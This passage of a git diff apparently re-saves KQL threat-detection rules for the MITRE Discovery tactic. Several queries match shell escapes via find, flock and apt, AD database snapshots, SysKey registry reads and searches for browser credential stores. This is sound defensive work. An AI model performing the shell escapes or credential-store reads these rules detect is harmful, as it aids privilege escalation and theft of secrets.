Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " . " and ProcessCommandLine contains "-exec") and FolderPath endswith "/find") \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql index 67b5bef1..5673720e 100644 --- a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql +++ b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql @@ -1,10 +1,10 @@ -// Title: Shell Execution via Flock - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Shell Execution via Flock - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -u " and FolderPath endswith "/flock") \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql index c927de1c..eefb729d 100644 --- a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql +++ b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql @@ -1,10 +1,10 @@ -// Title: Shell Execution via Nice - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Shell Execution via Nice - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/nice" \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql index ad38aa3a..6f2fbba6 100644 --- a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql +++ b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql @@ -1,11 +1,11 @@ -// Title: Shell Invocation via Apt - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-28 -// Level: medium -// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. -// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Shell Invocation via Apt - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. +// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where ProcessCommandLine contains "APT::Update::Pre-Invoke::=" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql index 9d0546ef..9b6a5b4e 100644 --- a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql +++ b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Active Directory Database Snapshot Via ADExplorer -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-14 -// Level: high -// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 - -DeviceProcessEvents +// Title: Suspicious Active Directory Database Snapshot Via ADExplorer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: high +// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 + +DeviceProcessEvents | where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql index 25af7557..9092079b 100644 --- a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql +++ b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution of Hostname -// Author: frack113 -// Date: 2022-01-01 -// Level: low -// Description: Use of hostname to get information -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: Suspicious Execution of Hostname +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Use of hostname to get information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where FolderPath endswith "\\HOSTNAME.EXE" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql index d7e57ab4..4df7244e 100644 --- a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql +++ b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution of Systeminfo -// Author: frack113 -// Date: 2022-01-01 -// Level: low -// Description: Detects usage of the "systeminfo" command to retrieve information -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: Suspicious Execution of Systeminfo +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Detects usage of the "systeminfo" command to retrieve information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql index 2d60224e..b3be07ec 100644 --- a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql +++ b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql @@ -1,14 +1,14 @@ -// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE -// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-16 -// Level: medium -// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE -// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.001, attack.t1087.002 -// False Positives: -// - Inventory tool runs -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE +// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE +// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002 +// False Positives: +// - Inventory tool runs +// - Administrative activity + +DeviceProcessEvents | where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts ")) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql index 023b2ff0..d6357ace 100644 --- a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql +++ b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Kernel Dump Using Dtrace -// Author: Florian Roth (Nextron Systems) -// Date: 2021-12-28 -// Level: high -// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: Suspicious Kernel Dump Using Dtrace +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-28 +// Level: high +// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_network_command.kql b/KQL/rules/Discovery/suspicious_network_command.kql index 53201dc7..2b43c97d 100644 --- a/KQL/rules/Discovery/suspicious_network_command.kql +++ b/KQL/rules/Discovery/suspicious_network_command.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Network Command -// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2021-12-07 -// Level: low -// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016 -// False Positives: -// - Administrator, hotline ask to user - -DeviceProcessEvents +// Title: Suspicious Network Command +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-12-07 +// Level: low +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Administrator, hotline ask to user + +DeviceProcessEvents | where ProcessCommandLine matches regex "ipconfig\\s+/all" or ProcessCommandLine matches regex "netsh\\s+interface show interface" or ProcessCommandLine matches regex "arp\\s+-a" or ProcessCommandLine matches regex "nbtstat\\s+-n" or ProcessCommandLine matches regex "net\\s+config" or ProcessCommandLine matches regex "route\\s+print" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql index 3e583006..8af365a5 100644 --- a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql +++ b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Network Connection to IP Lookup Service APIs -// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-24 -// Level: medium -// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016 -// False Positives: -// - Legitimate use of the external websites for troubleshooting or network monitoring - -DeviceNetworkEvents +// Title: Suspicious Network Connection to IP Lookup Service APIs +// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-24 +// Level: medium +// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate use of the external websites for troubleshooting or network monitoring + +DeviceNetworkEvents | where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql index 34ef9ca1..757bb1ad 100644 --- a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql +++ b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Query of MachineGUID -// Author: frack113 -// Date: 2022-01-01 -// Level: low -// Description: Use of reg to get MachineGuid information -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: Suspicious Query of MachineGUID +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Use of reg to get MachineGuid information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql index f6ee94f0..b4a46a64 100644 --- a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql +++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-10 -// Level: medium -// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.001 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-10 +// Level: medium +// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql index 80dedcc3..d9a19b81 100644 --- a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql +++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-08 -// Level: high -// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 - -DeviceProcessEvents +// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 + +DeviceProcessEvents | where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql index 0a7c5893..b33a447b 100644 --- a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql +++ b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Use of PsLogList -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-18 -// Level: medium -// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002 -// False Positives: -// - Another tool that uses the command line switches of PsLogList -// - Legitimate use of PsLogList by an administrator - -DeviceProcessEvents +// Title: Suspicious Use of PsLogList +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: medium +// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002 +// False Positives: +// - Another tool that uses the command line switches of PsLogList +// - Legitimate use of PsLogList by an administrator + +DeviceProcessEvents | where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " –d" or ProcessCommandLine contains " —d" or ProcessCommandLine contains " ―d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " –x" or ProcessCommandLine contains " —x" or ProcessCommandLine contains " ―x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " –c" or ProcessCommandLine contains " —c" or ProcessCommandLine contains " ―c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/Discovery/suspicious_where_execution.kql index d2a72589..dea00dd8 100644 --- a/KQL/rules/Discovery/suspicious_where_execution.kql +++ b/KQL/rules/Discovery/suspicious_where_execution.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Where Execution -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-13 -// Level: low -// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. -// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about -// internal network resources such as servers, tools/dashboards, or other related infrastructure. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1217 - -DeviceProcessEvents +// Title: Suspicious Where Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: low +// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. +// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about +// internal network resources such as servers, tools/dashboards, or other related infrastructure. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1217 + +DeviceProcessEvents | where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data") \ No newline at end of file diff --git a/KQL/rules/Discovery/syskey_registry_keys_access.kql b/KQL/rules/Discovery/syskey_registry_keys_access.kql index ddeba016..ddf7c896 100644 --- a/KQL/rules/Discovery/syskey_registry_keys_access.kql +++ b/KQL/rules/Discovery/syskey_registry_keys_access.kql @@ -1,10 +1,10 @@ -// Title: SysKey Registry Keys Access -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019-08-12 -// Level: high -// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1012 - -DeviceRegistryEvents +// Title: SysKey Registry Keys Access +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-12 +// Level: high +// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012 + +DeviceRegistryEvents | where RegistryKey endswith "lsa\\JD" or RegistryKey endswith "lsa\\GBG" or RegistryKey endswith "lsa\\Skew1" or RegistryKey endswith "lsa\\Data" \ No newline at end of file diff --git a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql index b85dbb89..8b36d4fa 100644 --- a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql +++ b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql @@ -1,10 +1,10 @@ -// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE -// Author: frack113 -// Date: 2021-12-16 -// Level: high -// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518.001 - -DeviceProcessEvents +// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE +// Author: frack113 +// Date: 2021-12-16 +// Level: high +// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents | where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery.kql b/KQL/rules/Discovery/system_information_discovery.kql index cc756587..0ba5ef2c 100644 --- a/KQL/rules/Discovery/system_information_discovery.kql +++ b/KQL/rules/Discovery/system_information_discovery.kql @@ -1,12 +1,12 @@ -// Title: System Information Discovery -// Author: Ömer Günal, oscd.community -// Date: 2020-10-08 -// Level: informational -// Description: Detects system information discovery commands -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: System Information Discovery +// Author: Ömer Günal, oscd.community +// Date: 2020-10-08 +// Level: informational +// Description: Detects system information discovery commands +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/uname" or FolderPath endswith "/hostname" or FolderPath endswith "/uptime" or FolderPath endswith "/lspci" or FolderPath endswith "/dmidecode" or FolderPath endswith "/lscpu" or FolderPath endswith "/lsmod" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql index 18badf3a..04e5e080 100644 --- a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql +++ b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql @@ -1,14 +1,14 @@ -// Title: System Information Discovery Using Ioreg -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-12-20 -// Level: medium -// Description: Detects the use of "ioreg" which will show I/O Kit registry 